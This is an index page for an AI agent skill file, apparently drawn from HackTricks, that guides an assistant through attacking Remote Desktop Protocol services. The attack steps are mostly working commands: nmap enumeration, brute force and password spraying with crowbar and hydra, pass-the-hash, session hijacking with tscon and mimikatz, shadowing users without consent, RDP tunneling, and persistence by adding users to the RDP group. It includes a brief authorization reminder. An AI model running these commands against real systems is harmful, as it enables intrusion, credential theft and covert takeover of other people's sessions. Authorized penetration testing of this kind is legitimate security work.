OpenSkillIndex← back to search

Hacktricks-skills rdp-pentesting

How to enumerate, attack, and exploit RDP (Remote Desktop Protocol) services during penetration testing. Use this skill whenever the user mentions RDP, port 3389, remote desktop, Windows remote access, RDP enumeration, RDP brute force, RDP shadowing, session hijacking, or any RDP-related security testing. This skill covers nmap enumeration, credential testing, session stealing, RDP shadowing attacks, virtual channel tunneling, and post-exploitation techniques.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-rdp/SKILL.MD
source content

RDP Pentesting Skill

This skill guides you through Remote Desktop Protocol (RDP) security testing, from initial enumeration through exploitation and post-exploitation.

Quick Reference

  • Default Port: 3389/tcp
  • Service Name: ms-wbt-server
  • Protocol: Remote Desktop Protocol (Microsoft)

Workflow Overview

  1. Enumerate the RDP service (encryption, vulnerabilities, NLA status)
  2. Test credentials (brute force, password spray, known creds)
  3. Connect with valid credentials
  4. Exploit (session stealing, shadowing, tunneling)
  5. Post-exploitation (persistence, privilege escalation)

1. Enumeration

Automatic Nmap Enumeration

Run this first to gather encryption settings, vulnerability info, and NTLM details:

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

This checks:

  • Available encryption levels
  • MS12-020 DoS vulnerability (without triggering it)
  • NTLM Windows version information

Security Layer and NLA Detection

Determine if Network Level Authentication (NLA) is required and what security layer is in use:

# Encryption and security layer info
nmap --script rdp-enum-encryption -p 3389 <IP>

# Quick authentication check (reports NLA requirement)
nxc rdp <IP> -u <user> -p <password>

# Pre-auth screenshot (only works if NLA is disabled)
nxc rdp <IP> --nla-screenshot

# Authenticated screenshot after valid login
nxc rdp <IP> -u <user> -p <password> --screenshot

Why this matters: NLA disabled means you can capture pre-authentication screenshots, which may reveal sensitive information. NLA enabled provides better security but may indicate a more hardened target.

2. Credential Testing

Brute Force (Use with Caution)

Warning: These attacks can lock accounts. Always get authorization and understand the target's lockout policy.

# Crowbar (batch mode)
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

# Hydra (single target)
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Password Spraying

Test one password against many users to avoid lockouts:

crowbar -b rdp -s <target_range> -U users.txt -c 'common_password'

Test Known Credentials

If you have credentials from other sources, verify them against RDP:

# Using rdp_check from impacket
rdp_check <domain>/<name>:<password>@<IP>

3. Connection Methods

Basic Connection

# rdesktop (simple)
rdesktop -u <username> <IP>

# rdesktop with domain
rdesktop -d <domain> -u <username> -p <password> <IP>

# xfreerdp (more features)
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>

# Pass-the-hash attack
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>

4. Session Stealing

Prerequisite: SYSTEM permissions on the target.

You can hijack any active RDP session without knowing the user's password.

List Active Sessions

query user

Hijack a Session

tscon <SESSION_ID> /dest:<SESSIONNAME>

What happens: You'll be inside the user's RDP session with their context. The original user gets disconnected.

Why this is powerful: You can access:

  • Passwords typed into Notepad (not saved to disk)
  • Other RDP sessions the user has open
  • Browser sessions with saved credentials
  • Any application state in memory

Using Mimikatz

ts::sessions        # List sessions
ts::remote /id:2    # Connect to session ID 2

5. RDP Shadowing (Remote Control)

If Remote Desktop Services shadowing is enabled, you can view or control another user's session.

List Sessions on Remote Host

qwinsta /server:<IP>
quser /server:<IP>

Shadow a Session

# With consent (if policy requires it)
mstsc /v:<IP> /shadow:<SESSION_ID> /control

# Without consent (if policy allows)
mstsc /v:<IP> /shadow:<SESSION_ID> /noconsentprompt /prompt

Check Shadowing Policy

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow

Policy values:

  • 0 = No shadowing
  • 1 = Shadow with consent
  • 2 = Shadow without consent

6. Virtual Channel Tunneling

RDP virtual channels can be abused for pivoting and tunneling.

Using rdp2tcp

# Start FreeRDP with rdp2tcp virtual channel
xfreerdp /u:<user> /v:<IP> /rdp2tcp:/path/to/rdp2tcp/client/rdp2tcp

This multiplexes TCP forwards over the RDP connection, allowing you to tunnel other services through the RDP session.

7. Persistence Techniques

Sticky Keys / Utilman Backdoor

Combine with sticky keys or utilman to maintain administrative access:

# Search for existing backdoors
# Use: https://github.com/linuz/Sticky-Keys-Slayer

Add User to RDP Group

net localgroup "Remote Desktop Users" <UserLoginName> /add

8. Process Injection

If a higher-privileged user logs in via RDP to a machine where you're admin, you can inject your beacon into their RDP session process.

See: 

../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md

9. Automated Tools

AutoRDPwn

Post-exploitation framework for automating RDP shadow attacks:

EvilRDP

Advanced RDP exploitation tool:

  • GitHub: https://github.com/skelsec/evilrdp
  • Features:
    • Automated mouse/keyboard control
    • Clipboard control
    • SOCKS proxy over RDP
    • Execute commands without file upload
    • File transfer even when disabled

SharpRDP

Execute commands without graphical interface:

Common Attack Scenarios

Scenario 1: Initial Access via RDP

  1. Enumerate with nmap scripts
  2. Check if NLA is disabled (easier to exploit)
  3. Test known credentials or spray passwords
  4. Connect and establish persistence

Scenario 2: Lateral Movement

  1. Obtain SYSTEM on one host
  2. Query RDP sessions on other hosts
  3. Use shadowing or session hijacking
  4. Pivot to additional systems

Scenario 3: Credential Harvesting

  1. Hijack active RDP session
  2. Access browser sessions, notepad, other apps
  3. Use Mimikatz for credential dumping
  4. Pass-the-hash to other systems

Safety Notes

  • Always have written authorization before testing RDP services
  • Account lockout policies vary - test in a controlled manner
  • Session hijacking disconnects users - coordinate with stakeholders
  • Shadowing may be logged - be aware of detection
  • Some techniques require SYSTEM - ensure you have appropriate access level

References